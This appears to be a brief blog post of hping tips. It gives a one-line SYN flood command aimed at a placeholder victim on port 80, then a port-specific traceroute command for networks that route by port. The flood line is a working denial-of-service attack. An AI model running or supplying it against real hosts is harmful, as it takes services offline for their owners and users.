SYN Flooding

hping -i u1 -S -p 80 <VICTIM>

*hrhrhr*

Traceroute spec. ports

On port-based routing environments you cannot simply use traceroute because the port traceroute uses may be going another route than the port you want to check… hping lets you do that:

hping2 -t 1 --traceroute -p <PORT> <DESTINATION>

Leave a Reply